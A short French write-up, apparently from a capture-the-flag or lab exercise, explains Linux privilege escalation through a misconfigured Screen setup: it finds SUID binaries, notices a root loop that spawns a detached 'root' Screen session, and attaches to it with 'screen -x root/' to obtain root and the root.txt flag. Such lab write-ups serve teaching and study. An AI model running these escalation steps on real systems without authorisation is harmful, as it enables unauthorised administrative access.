SUID (Screen) - Linux Privilege Escalation

Identification du binaire SUID

Nous allons chercher les fichiers ayant le bit SUID activé sur le système en utilisant la commande suivante :

find / -perm -4000 2>/dev/null

Analyse des processus Screen

Pour examiner les processus liés à Screen en cours d'exécution, nous utilisons la commande suivante :

ps -aux | grep "screen"

Nous trouvons le processus suivant en cours d'exécution :

/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

Le processus ci-dessus montre que Screen est configuré pour créer une session root si le dossier /var/run/screen/S-root/ est vide. Grâce à cette configuration, nous pouvons exploiter Screen pour obtenir un accès root.

screen -x root/

Flag root.txt :)

Après avoir accédé à la session Screen en tant que root, vous avez désormais les privilèges administrateur.

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?